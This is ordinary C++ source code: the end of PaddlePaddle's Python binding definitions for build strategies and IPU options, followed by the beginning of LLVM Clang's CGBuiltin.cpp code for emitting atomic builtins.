it will save GPU memory and may make the execution faster.
This options is only available in GPU devices.
Default is False.
Examples:
.. code-block:: python
import paddle
import paddle.static as static
paddle.enable_static()
build_strategy = static.BuildStrategy()
build_strategy.fuse_relu_depthwise_conv = True
)DOC")
.def_property("fuse_broadcast_ops",
[](const BuildStrategy &self) {
return self.fuse_broadcast_ops_ == true ||
self.fuse_broadcast_ops_ == paddle::none;
},
[](BuildStrategy &self, bool b) {
PADDLE_ENFORCE_NE(self.IsFinalized(), true,
platform::errors::PreconditionNotMet(
"BuildStrategy has been finlaized, "
"cannot be configured again."));
self.fuse_broadcast_ops_ = b;
},
R"DOC((bool, optional): fuse_broadcast_op indicates whether
to fuse the broadcast ops. Note that, in Reduce mode,
fusing broadcast ops may make the program faster. Because
fusing broadcast OP equals delaying the execution of all
broadcast Ops, in this case, all nccl streams are used only
for NCCLReduce operations for a period of time. Default False.
Examples:
.. code-block:: python
import paddle
import paddle.static as static
paddle.enable_static()
build_strategy = static.BuildStrategy()
build_strategy.fuse_broadcast_ops = True
)DOC")
.def_property("fuse_all_optimizer_ops",
[](const BuildStrategy &self) {
return self.fuse_all_optimizer_ops_ == true ||
self.fuse_all_optimizer_ops_ == paddle::none;
},
[](BuildStrategy &self, bool b) {
PADDLE_ENFORCE_NE(self.IsFinalized(), true,
platform::errors::PreconditionNotMet(
"BuildStrategy has been finlaized, "
"cannot be configured again."));
self.fuse_all_optimizer_ops_ = b;
})
.def_property(
"sync_batch_norm",
[](const BuildStrategy &self) { return self.sync_batch_norm_; },
[](BuildStrategy &self, bool b) {
PADDLE_ENFORCE_NE(self.IsFinalized(), true,
platform::errors::PreconditionNotMet(
"BuildStrategy has been finlaized, cannot be "
"configured again."));
self.sync_batch_norm_ = b;
},
R"DOC((bool, optional): sync_batch_norm indicates whether to use
synchronous batch normalization which synchronizes the mean
and variance through multi-devices in training phase.
Current implementation doesn't support FP16 training and CPU.
And only synchronous on one machine, not all machines.
Default is False.
Examples:
.. code-block:: python
import paddle
import paddle.static as static
paddle.enable_static()
build_strategy = static.BuildStrategy()
build_strategy.sync_batch_norm = True
)DOC")
.def_property(
"memory_optimize",
[](const BuildStrategy &self) -> py::object {
if (self.memory_optimize_) {
return py::cast(self.memory_optimize_.get());
} else {
return py::cast(nullptr);
}
},
[](BuildStrategy &self, const py::handle &value) {
auto *py_obj = value.ptr();
if (py_obj == nullptr || py_obj == Py_None) {
self.memory_optimize_ = paddle::none;
} else if (PyBool_Check(py_obj)) {
self.memory_optimize_ = (py_obj == Py_True);
} else {
PADDLE_THROW(platform::errors::InvalidArgument(
"BuildStrategy.memory_optimize must be set to None, False "
"or True"));
}
},
R"DOC((bool, optional): memory opitimize aims to save total memory
consumption, set to True to enable it.
Default None. None means framework would choose to use or not use
this strategy automatically. Currently, None means that it is
enabled when GC is disabled, and disabled when GC is enabled.
True means enabling and False means disabling. Default is None.
Examples:
.. code-block:: python
import paddle
import paddle.static as static
paddle.enable_static()
build_strategy = static.BuildStrategy()
build_strategy.memory_optimize = True
)DOC")
.def_property(
"is_distribution",
[](const BuildStrategy &self) { return self.is_distribution_; },
[](BuildStrategy &self, bool b) {
#ifdef WIN32
if (b) {
PADDLE_THROW(platform::errors::Unavailable(
"Distribution mode is not supported on Windows platform."));
}
#else
self.is_distribution_ = b;
#endif
})
.def_property("async_mode",
[](const BuildStrategy &self) { return self.async_mode_; },
[](BuildStrategy &self, bool b) { self.async_mode_ = b; })
.def_property(
"enable_inplace",
[](const BuildStrategy &self) { return self.enable_inplace_; },
[](BuildStrategy &self, bool b) { self.enable_inplace_ = b; })
.def_property(
"enable_addto",
[](const BuildStrategy &self) { return self.enable_addto_; },
[](BuildStrategy &self, bool b) { self.enable_addto_ = b; })
.def_property(
"fuse_all_reduce_ops",
[](const BuildStrategy &self) {
return self.fuse_all_reduce_ops_ == true ||
self.fuse_all_reduce_ops_ == paddle::none;
},
[](BuildStrategy &self, bool b) { self.fuse_all_reduce_ops_ = b; })
.def_property("enable_backward_optimizer_op_deps",
[](const BuildStrategy &self) {
return self.enable_backward_optimizer_op_deps_;
},
[](BuildStrategy &self, bool b) {
self.enable_backward_optimizer_op_deps_ = b;
})
.def_property(
"cache_runtime_context",
[](const BuildStrategy &self) { return self.cache_runtime_context_; },
[](BuildStrategy &self, bool b) { self.cache_runtime_context_ = b; })
.def_property(
"mkldnn_enabled_op_types",
[](const BuildStrategy &self) {
return self.mkldnn_enabled_op_types_;
},
[](BuildStrategy &self,
const std::unordered_set<std::string> &mkldnn_enabled_op_types) {
self.mkldnn_enabled_op_types_ = mkldnn_enabled_op_types;
})
.def_property(
"fix_op_run_order",
[](const BuildStrategy &self) { return self.fix_op_run_order_; },
[](BuildStrategy &self, bool fix_op_run_order) {
self.fix_op_run_order_ = fix_op_run_order;
})
.def_property("allow_cuda_graph_capture",
[](const BuildStrategy &self) {
return self.allow_cuda_graph_capture_;
},
[](BuildStrategy &self, bool allow_cuda_graph_capture) {
self.allow_cuda_graph_capture_ = allow_cuda_graph_capture;
})
.def("_copy",
[](const BuildStrategy &self) {
auto new_bs = self;
new_bs.ClearFinalized();
return new_bs;
})
.def("_finalize_strategy_and_create_passes",
[](BuildStrategy &self) -> std::shared_ptr<ir::PassBuilder> {
return self.CreatePassesFromStrategy(true);
},
R"DOC(Allow user to customized passes. Normally model-specific
optimization passes should be defined in this way. BuildStrategy
cannot be updated after being finalized.)DOC");
m.def("_set_cached_executor_build_strategy",
[](int64_t program_id, const BuildStrategy &build_strategy) {
auto &cached_exe_info = framework::ExecutorInfoCache::Instance();
cached_exe_info.SetBuildStrategy(program_id, build_strategy);
});
pe.def(py::init<const std::vector<platform::Place> &,
const std::vector<std::string> &, const std::string &,
Scope *, std::vector<Scope *> &, const ExecutionStrategy &,
const BuildStrategy &, ir::Graph *>())
// NOTE: even we return a vec<Scope*>* to Python use reference policy.
// We still cannot get local_scope from this vector, since the element
// of vec<Scope*> will be freed by Python GC. We can only return Scope*
// one by one and mark them as reference.
.def("local_scopes",
[](ParallelExecutor &self) -> std::vector<Scope *> * {
return &self.GetLocalScopes();
},
py::return_value_policy::reference)
.def("drop_local_exe_scopes", &ParallelExecutor::DropLocalExeScopes)
.def("_need_create_local_exe_scopes",
&ParallelExecutor::NeedCreateLocalExeScope)
.def("feed_tensors_into_local_scopes",
&ParallelExecutor::FeedTensorsIntoLocalScopes)
.def("feed_and_split_tensor_into_local_scopes",
&ParallelExecutor::FeedAndSplitTensorIntoLocalScopes)
.def("run",
[](ParallelExecutor &self,
const std::vector<std::string> &fetch_tensors,
bool return_merged) -> py::object {
paddle::framework::FetchResultType ret;
{
pybind11::gil_scoped_release release;
ret = self.Run(fetch_tensors, return_merged);
}
if (return_merged) {
return py::cast(
std::move(BOOST_GET(paddle::framework::FetchList, ret)));
} else {
return py::cast(std::move(
BOOST_GET(paddle::framework::FetchUnmergedList, ret)));
}
})
.def("device_count", &ParallelExecutor::DeviceCount);
#ifdef PADDLE_WITH_IPU
py::class_<platform::ipu::IpuBackend,
std::unique_ptr<platform::ipu::IpuBackend, py::nodelete>>(
m, "IpuBackend")
// manage IpuBackend in C++
.def("get_instance",
[]() {
return std::unique_ptr<platform::ipu::IpuBackend, py::nodelete>(
platform::ipu::IpuBackend::GetInstance());
},
py::return_value_policy::reference)
.def("detach", &platform::ipu::IpuBackend::Detach)
.def("reset", &platform::ipu::IpuBackend::Reset)
.def("set_scope", &platform::ipu::IpuBackend::SetScope)
.def("set_ipu_strategy", &platform::ipu::IpuBackend::SetIpuStrategy)
.def("save_model_proto", &platform::ipu::IpuBackend::SaveModelProto);
py::class_<platform::ipu::IpuStrategy>(m, "IpuStrategy")
.def(py::init())
.def("set_options",
[](platform::ipu::IpuStrategy &self, const py::dict &opt) {
for (auto element : opt) {
auto option_name = element.first.cast<std::string>();
VLOG(10) << "Set option: " << option_name;
if (py::isinstance<py::bool_>(element.second)) {
self.AddBoolOption(option_name, element.second.cast<bool>());
} else if (py::isinstance<py::float_>(element.second)) {
self.AddDoubleOption(option_name,
element.second.cast<double>());
} else if (py::isinstance<py::int_>(element.second)) {
self.AddUint64Option(option_name,
element.second.cast<std::uint64_t>());
} else if (py::isinstance<py::str>(element.second)) {
self.AddStringOption(option_name,
element.second.cast<std::string>());
} else if (py::isinstance<py::set>(element.second) ||
py::isinstance<py::list>(element.second)) {
for (auto option : element.second.cast<py::list>()) {
std::string option_val;
if (py::isinstance<py::str>(option)) {
option_val = option.cast<std::string>();
} else if (py::isinstance<py::int_>(option)) {
option_val = std::to_string(option.cast<std::uint64_t>());
} else {
PADDLE_THROW(platform::errors::Unimplemented(
"Failed to convert type: %s when set IpuStrategy "
"option: %s",
option.get_type(), option_name));
}
self.InsertStringOption(option_name, option_val);
}
} else if (py::isinstance<py::dict>(element.second)) {
if (option_name.rfind("location_", 0) == 0) {
for (auto option : element.second.cast<py::dict>()) {
self.SetTensorLocation(
option_name, option.first.cast<std::string>(),
option.second.cast<std::uint64_t>());
}
} else if (option_name == "custom_op") {
std::string paddle_op;
std::string popart_op;
std::string domain;
int version = -1;
for (auto option : element.second.cast<py::dict>()) {
std::string option_key = option.first.cast<std::string>();
if (option_key == "paddle_op") {
paddle_op = option.second.cast<std::string>();
} else if (option_key == "popart_op") {
popart_op = option.second.cast<std::string>();
} else if (option_key == "domain") {
domain = option.second.cast<std::string>();
} else if (option_key == "version") {
version = option.second.cast<int>();
} else {
PADDLE_THROW(platform::errors::InvalidArgument(
"Invalid argument, key must be one of paddle_op, "
"popart_op, domain or version, but revecived %s",
option_key));
}
}
self.AddCustomOp(paddle_op, popart_op, domain, version);
} else {
for (auto option : element.second.cast<py::dict>()) {
std::string option_key = option.first.cast<std::string>();
std::string option_val;
if (py::isinstance<py::str>(option.second)) {
option_val = option.second.cast<std::string>();
} else if (py::isinstance<py::int_>(option.second)) {
option_val =
std::to_string(option.second.cast<std::uint64_t>());
} else {
PADDLE_THROW(platform::errors::Unimplemented(
"Failed to convert value type: %s when set "
"IpuStrategy option: %s",
option.second.get_type(), option_key));
}
self.InsertStringPairOption(option_name, option_key,
option_val);
}
}
} else {
PADDLE_THROW(platform::errors::InvalidArgument(
"Invalid IpuStrategy option value type: %s, please check "
"input value for option: %s",
element.second.get_type(), option_name));
}
}
})
.def("get_option",
[](platform::ipu::IpuStrategy &self, const std::string &name) {
py::dict res;
auto option_type = self.GetOptionType(name);
res["name"] = name;
res["type"] = option_type;
if (option_type == "vector") {
auto value = self.GetVectorOption(name);
res["value"] = value;
} else if (option_type == "map") {
auto value = self.GetMapOption(name);
res["value"] = value;
} else {
auto value_s = self.GetOption(name);
res["value_s"] = value_s;
if (option_type == "bool") {
res["value"] = static_cast<bool>(std::stoi(value_s));
} else if (option_type == "uint64") {
res["value"] = std::stoul(value_s);
} else if (option_type == "double") {
res["value"] = std::stod(value_s);
} else if (option_type == "string") {
res["value"] = value_s;
}
}
return res;
})
.def("get_all_option_names",
&platform::ipu::IpuStrategy::GetAllOptionNames)
.def("enable_pattern", &platform::ipu::IpuStrategy::EnablePattern)
.def("disable_pattern", &platform::ipu::IpuStrategy::DisablePattern)
.def("is_pattern_enabled", &platform::ipu::IpuStrategy::IsPatternEnabled);
#endif
BindFleetWrapper(&m);
BindIO(&m);
#if defined(PADDLE_WITH_PSLIB) && !defined(PADDLE_WITH_HETERPS)
BindHeterWrapper(&m);
BindMetrics(&m);
#endif
#ifdef PADDLE_WITH_HETERPS
BindPSGPUWrapper(&m);
#endif
BindGlooWrapper(&m);
BindBoxHelper(&m);
#ifdef PADDLE_WITH_BOX_PS
BindBoxWrapper(&m);
#endif
#if defined(PADDLE_WITH_NCCL) || defined(PADDLE_WITH_RCCL)
BindNCCLWrapper(&m);
#endif
#ifdef PADDLE_WITH_GLOO
BindGlooContext(&m);
#endif
BindGraph(&m);
BindNode(&m);
BindPass(&m);
BindInferenceApi(&m);
BindCompatible(&m);
BindDataset(&m);
BindGenerator(&m);
#ifndef PADDLE_ON_INFERENCE
BindDistributed(&m);
#endif
#ifdef PADDLE_WITH_ASCEND
BindAscendWrapper(&m);
BindAscendGraph(&m);
BindAscendDevice(&m);
#endif
#ifdef PADDLE_WITH_CRYPTO
BindCrypto(&m);
#endif
#if defined PADDLE_WITH_PSCORE
BindDistFleetWrapper(&m);
BindPSHost(&m);
BindCommunicatorContext(&m);
BindDistCommunicator(&m);
BindHeterClient(&m);
BindGraphPyFeatureNode(&m);
BindGraphNode(&m);
BindGraphPyService(&m);
BindGraphPyServer(&m);
BindGraphPyClient(&m);
BindIndexNode(&m);
BindTreeIndex(&m);
BindIndexWrapper(&m);
BindIndexSampler(&m);
BindSparseShardingTools(&m);
#endif
}
} // namespace pybind
} // namespace paddle
|
//===---- CGBuiltin.cpp - Emit LLVM Code for builtins ---------------------===//
//
// Part of the LLVM Project, under the Apache License v2.0 with LLVM Exceptions.
// See https://llvm.org/LICENSE.txt for license information.
// SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception
//
//===----------------------------------------------------------------------===//
//
// This contains code to emit Builtin calls as LLVM code.
//
//===----------------------------------------------------------------------===//
#include "CGCUDARuntime.h"
#include "CGCXXABI.h"
#include "CGObjCRuntime.h"
#include "CGOpenCLRuntime.h"
#include "CGRecordLayout.h"
#include "CodeGenFunction.h"
#include "CodeGenModule.h"
#include "ConstantEmitter.h"
#include "PatternInit.h"
#include "TargetInfo.h"
#include "clang/AST/ASTContext.h"
#include "clang/AST/Attr.h"
#include "clang/AST/Decl.h"
#include "clang/AST/OSLog.h"
#include "clang/Basic/TargetBuiltins.h"
#include "clang/Basic/TargetInfo.h"
#include "clang/CodeGen/CGFunctionInfo.h"
#include "llvm/ADT/APFloat.h"
#include "llvm/ADT/APInt.h"
#include "llvm/ADT/SmallPtrSet.h"
#include "llvm/ADT/StringExtras.h"
#include "llvm/Analysis/ValueTracking.h"
#include "llvm/IR/DataLayout.h"
#include "llvm/IR/InlineAsm.h"
#include "llvm/IR/Intrinsics.h"
#include "llvm/IR/IntrinsicsAArch64.h"
#include "llvm/IR/IntrinsicsAMDGPU.h"
#include "llvm/IR/IntrinsicsARM.h"
#include "llvm/IR/IntrinsicsBPF.h"
#include "llvm/IR/IntrinsicsHexagon.h"
#include "llvm/IR/IntrinsicsNVPTX.h"
#include "llvm/IR/IntrinsicsPowerPC.h"
#include "llvm/IR/IntrinsicsR600.h"
#include "llvm/IR/IntrinsicsRISCV.h"
#include "llvm/IR/IntrinsicsS390.h"
#include "llvm/IR/IntrinsicsWebAssembly.h"
#include "llvm/IR/IntrinsicsX86.h"
#include "llvm/IR/MDBuilder.h"
#include "llvm/IR/MatrixBuilder.h"
#include "llvm/Support/ConvertUTF.h"
#include "llvm/Support/ScopedPrinter.h"
#include "llvm/Support/X86TargetParser.h"
#include <sstream>
using namespace clang;
using namespace CodeGen;
using namespace llvm;
static
int64_t clamp(int64_t Value, int64_t Low, int64_t High) {
return std::min(High, std::max(Low, Value));
}
static void initializeAlloca(CodeGenFunction &CGF, AllocaInst *AI, Value *Size,
Align AlignmentInBytes) {
ConstantInt *Byte;
switch (CGF.getLangOpts().getTrivialAutoVarInit()) {
case LangOptions::TrivialAutoVarInitKind::Uninitialized:
// Nothing to initialize.
return;
case LangOptions::TrivialAutoVarInitKind::Zero:
Byte = CGF.Builder.getInt8(0x00);
break;
case LangOptions::TrivialAutoVarInitKind::Pattern: {
llvm::Type *Int8 = llvm::IntegerType::getInt8Ty(CGF.CGM.getLLVMContext());
Byte = llvm::dyn_cast<llvm::ConstantInt>(
initializationPatternFor(CGF.CGM, Int8));
break;
}
}
if (CGF.CGM.stopAutoInit())
return;
auto *I = CGF.Builder.CreateMemSet(AI, Byte, Size, AlignmentInBytes);
I->addAnnotationMetadata("auto-init");
}
/// getBuiltinLibFunction - Given a builtin id for a function like
/// "__builtin_fabsf", return a Function* for "fabsf".
llvm::Constant *CodeGenModule::getBuiltinLibFunction(const FunctionDecl *FD,
unsigned BuiltinID) {
assert(Context.BuiltinInfo.isLibFunction(BuiltinID));
// Get the name, skip over the __builtin_ prefix (if necessary).
StringRef Name;
GlobalDecl D(FD);
// TODO: This list should be expanded or refactored after all GCC-compatible
// std libcall builtins are implemented.
static SmallDenseMap<unsigned, StringRef, 8> F128Builtins{
{Builtin::BI__builtin_printf, "__printfieee128"},
{Builtin::BI__builtin_vsnprintf, "__vsnprintfieee128"},
{Builtin::BI__builtin_vsprintf, "__vsprintfieee128"},
{Builtin::BI__builtin_sprintf, "__sprintfieee128"},
{Builtin::BI__builtin_snprintf, "__snprintfieee128"},
{Builtin::BI__builtin_fprintf, "__fprintfieee128"},
{Builtin::BI__builtin_nexttowardf128, "__nexttowardieee128"},
};
// If the builtin has been declared explicitly with an assembler label,
// use the mangled name. This differs from the plain label on platforms
// that prefix labels.
if (FD->hasAttr<AsmLabelAttr>())
Name = getMangledName(D);
else {
// TODO: This mutation should also be applied to other targets other than
// PPC, after backend supports IEEE 128-bit style libcalls.
if (getTriple().isPPC64() &&
&getTarget().getLongDoubleFormat() == &llvm::APFloat::IEEEquad() &&
F128Builtins.find(BuiltinID) != F128Builtins.end())
Name = F128Builtins[BuiltinID];
else
Name = Context.BuiltinInfo.getName(BuiltinID) + 10;
}
llvm::FunctionType *Ty =
cast<llvm::FunctionType>(getTypes().ConvertType(FD->getType()));
return GetOrCreateLLVMFunction(Name, Ty, D, /*ForVTable=*/false);
}
/// Emit the conversions required to turn the given value into an
/// integer of the given size.
static Value *EmitToInt(CodeGenFunction &CGF, llvm::Value *V,
QualType T, llvm::IntegerType *IntType) {
V = CGF.EmitToMemory(V, T);
if (V->getType()->isPointerTy())
return CGF.Builder.CreatePtrToInt(V, IntType);
assert(V->getType() == IntType);
return V;
}
static Value *EmitFromInt(CodeGenFunction &CGF, llvm::Value *V,
QualType T, llvm::Type *ResultType) {
V = CGF.EmitFromMemory(V, T);
if (ResultType->isPointerTy())
return CGF.Builder.CreateIntToPtr(V, ResultType);
assert(V->getType() == ResultType);
return V;
}
/// Utility to insert an atomic instruction based on Intrinsic::ID
/// and the expression node.
static Value *MakeBinaryAtomicValue(
CodeGenFunction &CGF, llvm::AtomicRMWInst::BinOp Kind, const CallExpr *E,
AtomicOrdering Ordering = AtomicOrdering::SequentiallyConsistent) {
QualType T = E->getType();
assert(E->getArg(0)->getType()->isPointerType());
assert(CGF.getContext().hasSameUnqualifiedType(T,
E->getArg(0)->getType()->getPointeeType()));
assert(CGF.getContext().hasSameUnqualifiedType(T, E->getArg(1)->getType()));
llvm::Value *DestPtr = CGF.EmitScalarExpr(E->getArg(0));
unsigned AddrSpace = DestPtr->getType()->getPointerAddressSpace();
llvm::IntegerType *IntType =
llvm::IntegerType::get(CGF.getLLVMContext(),
CGF.getContext().getTypeSize(T));
llvm::Type *IntPtrType = IntType->getPointerTo(AddrSpace);
llvm::Value *Args[2];
Args[0] = CGF.Builder.CreateBitCast(DestPtr, IntPtrType);
Args[1] = CGF.EmitScalarExpr(E->getArg(1));
llvm::Type *ValueType = Args[1]->getType();
Args[1] = EmitToInt(CGF, Args[1], T, IntType);
llvm::Value *Result = CGF.Builder.CreateAtomicRMW(
Kind, Args[0], Args[1], Ordering);
return EmitFromInt(CGF, Result, T, ValueType);
}
static Value *EmitNontemporalStore(CodeGenFunction &CGF, const CallExpr *E) {
Value *Val = CGF.EmitScalarExpr(E->getArg(0));
Value *Address = CGF.EmitScalarExpr(E->getArg(1));
// Convert the type of the pointer to a pointer to the stored type.
Val = CGF.EmitToMemory(Val, E->getArg(0)->getType());
unsigned SrcAddrSpace = Address->getType()->getPointerAddressSpace();
Value *BC = CGF.Builder.CreateBitCast(
Address, llvm::PointerType::get(Val->getType(), SrcAddrSpace), "cast");
LValue LV = CGF.MakeNaturalAlignAddrLValue(BC, E->getArg(0)->getType());
LV.setNontemporal(true);
CGF.EmitStoreOfScalar(Val, LV, false);
return nullptr;
}
static Value *EmitNontemporalLoad(CodeGenFunction &CGF, const CallExpr *E) {
Value *Address = CGF.EmitScalarExpr(E->getArg(0));
LValue LV = CGF.MakeNaturalAlignAddrLValue(Address, E->getType());
LV.setNontemporal(true);
return CGF.EmitLoadOfScalar(LV, E->getExprLoc());
}
static RValue EmitBinaryAtomic(CodeGenFunction &CGF,
llvm::AtomicRMWInst::BinOp Kind,
const CallExpr *E) {
return RValue::get(MakeBinaryAtomicValue(CGF, Kind, E));
}
/// Utility to insert an atomic instruction based Intrinsic::ID and
/// the expression node, where the return value is the result of the
/// operation.
static RValue EmitBinaryAtomicPost(CodeGenFunction &CGF,
llvm::AtomicRMWInst::BinOp Kind,
const CallExpr *E,
Instruction::BinaryOps Op,
bool Invert = false) {
QualType T = E->getType();
assert(E->getArg(0)->getType()->isPointerType());
assert(CGF.getContext().hasSameUnqualifiedType(T,
E->getArg(0)->getType()->getPointeeType()));
assert(CGF.getContext().hasSameUnqualifiedType(T, E->getArg(1)->getType()));
llvm::Value *DestPtr = CGF.EmitScalarExpr(E->getArg(0));
unsigned AddrSpace = DestPtr->getType()->getPointerAddressSpace();
llvm::IntegerType *IntType =
llvm::IntegerType::get(CGF.getLLVMContext(),
CGF.getContext().getTypeSize(T));
llvm::Type *IntPtrType = IntType->getPointerTo(AddrSpace);
llvm::Value *Args[2];
Args[1] = CGF.EmitScalarExpr(E->getArg(1));
llvm::Type *ValueType = Args[1]->getType();
Args[1] = EmitToInt(CGF, Args[1], T, IntType);
Args[0] = CGF.Builder.CreateBitCast(DestPtr, IntPtrType);
llvm::Value *Result = CGF.Builder.CreateAtomicRMW(
Kind, Args[0], Args[1], llvm::AtomicOrdering::SequentiallyConsistent);
Result = CGF.Builder.CreateBinOp(Op, Result, Args[1]);
if (Invert)
Result =
CGF.Builder.CreateBinOp(llvm::Instruction::Xor, Result,
llvm::ConstantInt::getAllOnesValue(IntType));
Result = EmitFromInt(CGF, Result, T, ValueType);
return RValue::get(Result);
}
/// Utility to insert an atomic cmpxchg instruction.
///
/// @param CGF The current codegen function.
/// @param E Builtin call expression to convert to cmpxchg.
/// arg0 - address to operate on
/// arg1 - value to compare with
/// arg2 - new value
/// @param ReturnBool Specifies whether to return success flag of
/// cmpxchg result or the old value.
///
/// @returns result of cmpxchg, according to ReturnBool
///
/// Note: In order to lower Microsoft's _InterlockedCompareExchange* intrinsics
/// invoke the function EmitAtomicCmpXchgForMSIntrin.
static Value *MakeAtomicCmpXchgValue(CodeGenFunction &CGF, const CallExpr *E,
bool ReturnBool) {
QualType T = ReturnBool ? E->getArg(1)->getType() : E->getType();
llvm::Value *DestPtr = CGF.EmitScalarExpr(E->getArg(0));
unsigned AddrSpace = DestPtr->getType()->getPointerAddressSpace();
llvm::IntegerType *IntType = llvm::IntegerType::get(
CGF.getLLVMContext(), CGF.getContext().getTypeSize(T));
llvm::Type *IntPtrType = IntType->getPointerTo(AddrSpace);
Value *Args[3];
Args[0] = CGF.Builder.CreateBitCast(DestPtr, IntPtrType);
Args[1] = CGF.EmitScalarExpr(E->getArg(1));
llvm::Type *ValueType = Args[1]->getType();
Args[1] = EmitToInt(CGF, Args[1], T, IntType);
Args[2] = EmitToInt(CGF, CGF.EmitScalarExpr(E->getArg(2)), T, IntType);
Value *Pair = CGF.Builder.CreateAtomicCmpXchg(
Args[0], Args[1], Args[2], llvm::AtomicOrdering::SequentiallyConsistent,
llvm::AtomicOrdering::SequentiallyConsistent);
if (ReturnBool)
// Extract boolean success flag and zext it to int.
return CGF.Builder.CreateZExt(CGF.Builder.CreateExtractValue(Pair, 1),
CGF.ConvertType(E->getType()));
else
// Extract old value and emit it using the same type as compare value.
return EmitFromInt(CGF, CGF.Builder.CreateExtractValue(Pair, 0), T,
ValueType);
}
/// This function should be invoked to emit atomic cmpxchg for Microsoft's
/// _InterlockedCompareExchange* intrinsics which have the following signature:
/// T _InterlockedCompareExchange(T volatile *Destination,
/// T Exchange,
/// T Comparand);
///
/// Whereas the llvm 'cmpxchg' instruction has the following syntax:
/// cmpxchg *Destination, Comparand, Exchange.
/// So we need to swap Comparand and Exchange when invoking
/// CreateAtomicCmpXchg. That is the reason we could not use the above utility
/// function MakeAtomicCmpXchgValue since it expects the arguments to be
/// already swapped.
static
Value *EmitAtomicCmpXchgForMSIntrin(CodeGenFunction &CGF, const CallExpr *E,
AtomicOrdering SuccessOrdering = AtomicOrdering::SequentiallyConsistent) {
assert(E->getArg(0)->getType()->isPointerType());
assert(CGF.getContext().hasSameUnqualifiedType(
E->getType(), E->getArg(0)->getType()->getPointeeType()));
assert(CGF.getContext().hasSameUnqualifiedType(E->getType(),
E->getArg(1)->getType()));
assert(CGF.getContext().hasSameUnqualifiedType(E->getType(),
E->getArg(2)->getType()));
auto *Destination = CGF.EmitScalarExpr(E->getArg(0));
auto *Comparand = CGF.EmitScalarExpr(E->getArg(2));
auto *Exchange = CGF.EmitScalarExpr(E->getArg(1));
// For Release ordering, the failure ordering should be Monotonic.
auto FailureOrdering = SuccessOrdering == AtomicOrdering::Release ?
AtomicOrdering::Monotonic :
SuccessOrdering;
// The atomic instruction is marked volatile for consistency with MSVC. This
// blocks the few atomics optimizations that LLVM has. If we want to optimize
// _Interlocked* operations in the future, we will have to remove the volatile
// marker.
auto *Result = CGF.Builder.CreateAtomicCmpXchg(
Destination, Comparand, Exchange,
SuccessOrdering, FailureOrdering);
Result->setVolatile(true);
return CGF.Builder.CreateExtractValue(Result, 0);
}
// 64-bit Microsoft platforms support 128 bit cmpxchg operations. They are
// prototyped like this:
//
// unsigned char _InterlockedCompareExchange128...(
// __int64 volatile * _Destination,
// __int64 _ExchangeHigh,
// __int64 _ExchangeLow,
// __int64 * _ComparandResult);
static Value *EmitAtomicCmpXchg128ForMSIntrin(CodeGenFunction &CGF,
const CallExpr *E,
AtomicOrdering SuccessOrdering) {
assert(E->getNumArgs() == 4);
llvm::Value *Destination = CGF.EmitScalarExpr(E->getArg(0));
llvm::Value *ExchangeHigh = CGF.EmitScalarExpr(E->getArg(1));
llvm::Value *ExchangeLow = CGF.EmitScalarExpr(E->getArg(2));
llvm::Value *ComparandPtr = CGF.EmitScalarExpr(E->getArg(3));
assert(Destination->getType()->isPointerTy());
assert(!ExchangeHigh->getType()->isPointerTy());
assert(!ExchangeLow->getType()->isPointerTy());
assert(ComparandPtr->getType()->isPointerTy());
// For Release ordering, the failure ordering should be Monotonic.
auto FailureOrdering = SuccessOrdering == AtomicOrdering::Release
? AtomicOrdering::Monotonic
: SuccessOrdering;
// Convert to i128 pointers and values.
llvm::Type *Int128Ty = llvm::IntegerType::get(CGF.getLLVMContext(), 128);
llvm::Type *Int128PtrTy = Int128Ty->getPointerTo();
Destination = CGF.Builder.CreateBitCast(Destination, Int128PtrTy);
Address ComparandResult(CGF.Builder.CreateBitCast(ComparandPtr, Int128PtrTy),
CGF.getContext().toCharUnitsFromBits(128));
// (((i128)hi) << 64) | ((i128)lo)
ExchangeHigh = CGF.Builder.CreateZExt(ExchangeHigh, Int128Ty);
ExchangeLow = CGF.Builder.CreateZExt(ExchangeLow, Int128Ty);
ExchangeHigh =
CGF.Builder.CreateShl(ExchangeHigh, llvm::ConstantInt::get(Int128Ty, 64));
llvm::Value *Exchange = CGF.Builder.CreateOr(ExchangeHigh, ExchangeLow);
// Load the comparand for the instruction.
llvm::Value *Comparand = CGF.Builder.CreateLoad(ComparandResult);
auto *CXI = CGF.Builder.CreateAtomicCmpXchg(Destination, Comparand, Exchange,
SuccessOrdering, FailureOrdering);
// The atomic instruction is marked volatile for consistency with MSVC. This
// blocks the few atomics optimizations that LLVM has. If we want to optimize
// _Interlocked* operations in the future, we will have to remove the volatile
// marker.
CXI->setVolatile(true);
// Store the result as an outparameter.
CGF.Builder.CreateStore(CGF.Builder.CreateExtractValue(CXI, 0),
ComparandResult);
// Get the success boolean and zero extend it to i8.
Value *Success = CGF.Builder.CreateExtractValue(CXI, 1);
return CGF.Builder.CreateZExt(Success, CGF.Int8Ty);
}
static Value *EmitAtomicIncrementValue(CodeGenFunction &CGF, const CallExpr *E,
AtomicOrdering Ordering = AtomicOrdering::SequentiallyConsistent) {
assert(E->getArg(0)->getType()->isPointerType());
auto *IntTy = CGF.ConvertType(E->getType());
auto *Result = CGF.Builder.CreateAtomicRMW(
AtomicRMWInst::Add,
CGF.EmitScalarExpr(E->getArg(0)),
ConstantInt::get(IntTy, 1),
Ordering);
return CGF.Builder.CreateAdd(Result, ConstantInt::get(IntTy, 1));
}
static Value *EmitAtomicDecrementValue(CodeGenFunction &CGF, const CallExpr *E,
AtomicOrdering Ordering = AtomicOrdering::SequentiallyConsistent) {
assert(E->getArg(0)->getType()->isPointerType());
auto *IntTy = CGF.ConvertType(E->getType());
auto *Result = CGF.Builder.CreateAtomicRMW(
AtomicRMWInst::Sub,
CGF.EmitScalarExpr(E->getArg(0)),
ConstantInt::get(IntTy, 1),
Ordering);
return CGF.Builder.CreateSub(Result, ConstantInt::get(IntTy, 1));
}
// Build a plain volatile load.
static Value *EmitISOVolatileLoad(CodeGenFunction &CGF, const CallExpr *E) {
Value *Ptr = CGF.EmitScalarExpr(E->getArg(0));
QualType ElTy = E->getArg(0)->getType()->getPointeeType();
CharUnits LoadSize = CGF.getContext().getTypeSizeInChars(ElTy);
llvm::Type *ITy =
llvm::IntegerType::get(CGF.getLLVMContext(), LoadSize.getQuantity() * 8);
Ptr = CGF.Builder.CreateBitCast(Ptr, ITy->getPointerTo());
llvm::LoadInst *Load = CGF.Builder.CreateAlignedLoad(ITy, Ptr, LoadSize);
Load->setVolatile(true);
return Load;
}
// Build a plain volatile store.
static Value *EmitISOVolatileStore(CodeGenFunction &CGF, const CallExpr *E) {
Value *Ptr = CGF.EmitScalarExpr(E->getArg(0));
